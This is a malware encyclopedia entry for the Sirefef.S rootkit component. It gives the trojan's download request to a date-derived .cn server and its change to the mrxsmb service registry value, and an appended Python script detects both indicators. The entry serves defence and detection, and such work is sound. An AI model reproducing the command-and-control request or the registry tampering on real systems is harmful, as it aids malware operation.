Trojan:Win32/Sirefef.S is a component of the Win32/Sirefef rootkit. It downloads and executes an arbitrary file. Win32/Sirefef is a multi-component malware family that tampers with an affected user's Internet experience by modifying search results.
Trojan:Win32/Sirefef.S may be created by Win32/Sirefef rootkit installers, such as Trojan:Win32/Sirefef.J and Backdoor:Win32/Smadow.
The following folders, which are marked as "hidden", may also be created by the rootkit installers alongside Trojan:Win32/Sirefef.S:
Trojan:Win32/Sirefef.S may be present as the file "resident.dll" in the first folder created above. However, if a user attempts to access these folders, the rootkit may terminate the accessing process.
The rootkit installers may also change the registry value "Type" to "1" for the following Windows service subkey:
HKLM\SYSTEM\CurrentControlSet\services\mrxsmb
Downloads arbitrary files
Trojan:Win32/Sirefef.S downloads and executes arbitrary files from a remote server. It does this by issuing the following HTTP GET request:
GET /p/tasks.php?w<ID>&n=0 HTTP/1.0
HOST: <server name>.cn
where <ID> is an identifier for the affected computer and <server name> is a remote server whose name is calculated from the current calendar date.
Analysis by Sergey Chernyshev
The following system changes may indicate the presence of this malware:
- The following registry change:
  In subkey: HKLM\SYSTEM\CurrentControlSet\services\mrxsmb
  Modified value: "Type"
  With data: "1"
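The two indicators described on this page (the task-download GET request and the modified "Type" value of the mrxsmb service) can be checked against collected evidence without touching a live system. The script below is an added example and is not code from the original page or from Microsoft; it runs a regular expression for the documented request path over constructed proxy log lines and reads the mrxsmb "Type" value from a constructed reg-export snapshot. The log lines, the placeholder .cn host names (the real ones are date-derived), the optional "=" after "w" in the query string, and the assumed baseline Type of 2 (SERVICE_FILE_SYSTEM_DRIVER) are all assumptions; confirm the baseline against a known-good system before alerting on it.

```python
import re

# Constructed sample proxy log lines (not from the page). Host names are
# placeholders, since the real server name is derived from the current date.
SAMPLE_PROXY_LOG = [
    '10.0.0.21 - - [01/Jan/2012:10:00:01] "GET /index.html HTTP/1.1" 200 www.example.com',
    '10.0.0.21 - - [01/Jan/2012:10:00:05] "GET /p/tasks.php?w0A1B2C3D&n=0 HTTP/1.0" 200 placeholder-dga-host.cn',
    '10.0.0.33 - - [01/Jan/2012:10:00:07] "GET /p/tasks.php?w=ffee0011&n=0 HTTP/1.0" 200 another-placeholder.cn',
    '10.0.0.33 - - [01/Jan/2012:10:00:09] "POST /upload HTTP/1.1" 200 www.example.org',
]

# Matches the documented request "GET /p/tasks.php?w<ID>&n=0 HTTP/1.0".
# The optional "=" after "w" is an assumption so both spellings are caught.
TASKS_RE = re.compile(
    r'"GET (/p/tasks\.php\?w=?(?P<id>[0-9A-Za-z]+)&n=0) HTTP/1\.0"\s+\d+\s+(?P<host>\S+)'
)


def find_task_requests(log_lines):
    """Return one dict per log line that matches the Sirefef.S task request."""
    hits = []
    for line in log_lines:
        m = TASKS_RE.search(line)
        if not m:
            continue
        host = m.group("host")
        hits.append({
            "line": line,
            "id": m.group("id"),
            "host": host,
            # The page documents a .cn server; flag it, but do not require it.
            "cn_tld": host.lower().endswith(".cn"),
        })
    return hits


# Constructed reg-export style snapshot (not from the page), showing the
# mrxsmb "Type" value set to 1 as the installers are documented to do.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\mrxsmb]
"Type"=dword:00000001
"Start"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\mrxsmb20]
"Type"=dword:00000002
"""

MRXSMB_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\mrxsmb"


def parse_reg_export(text):
    """Minimal parser: {subkey: {value_name: raw_data}} for a .reg export."""
    values = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            values.setdefault(current, {})
        elif current is not None and line.startswith('"') and "=" in line:
            name, _, data = line.partition("=")
            values[current][name.strip('"')] = data
    return values


def mrxsmb_type(reg_values):
    """Return the mrxsmb service Type as an int, or None if absent/not a dword."""
    data = reg_values.get(MRXSMB_KEY, {}).get("Type")
    if data is None or not data.lower().startswith("dword:"):
        return None
    return int(data[len("dword:"):], 16)


def mrxsmb_type_modified(reg_values, baseline=2):
    """True if Type differs from the operator-supplied baseline (assumed 2)."""
    current = mrxsmb_type(reg_values)
    if current is None:
        return None
    return current != baseline


if __name__ == "__main__":
    for hit in find_task_requests(SAMPLE_PROXY_LOG):
        print("task request: id=%s host=%s cn=%s" % (hit["id"], hit["host"], hit["cn_tld"]))
    reg = parse_reg_export(SAMPLE_REG_EXPORT)
    print("mrxsmb Type =", mrxsmb_type(reg), "modified:", mrxsmb_type_modified(reg))
```

Running the script over real proxy logs and a `reg export HKLM\SYSTEM\CurrentControlSet\services\mrxsmb` dump from a suspect host gives a quick triage answer; the registry check is deliberately a comparison against a baseline rather than a hard-coded "normal" value, because a wrong baseline would alert on every clean machine.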